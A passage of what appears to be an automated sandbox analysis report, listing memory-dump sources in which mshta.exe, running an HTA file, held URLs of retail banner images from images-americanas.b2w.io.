00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542695119.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12553270675.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512977574.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555261768.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.pnge-desk-
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558448951.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_mob-26a210faf78c.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575168937.000000000969B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png3g
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png:b
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575168937.000000000969B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngFg.
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550858486.000000000968C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png~I
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/1-banners_home_mob-campanhas-home-300x450-9e
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573176961.000000000715C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557976604.0000000007154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-banners_home_mob-campanhas-home-300x450-5f
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_desk-094ccd4f78f0.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-home-destaque_mob-dfc74d8af364.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/3-banners_home_mob-campanhas-home-300x450-2a
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/4-banners_home_mob-campanhas-home-300x450-79
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/7-banners_home_mob-campanhas-home-300x450-ca
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 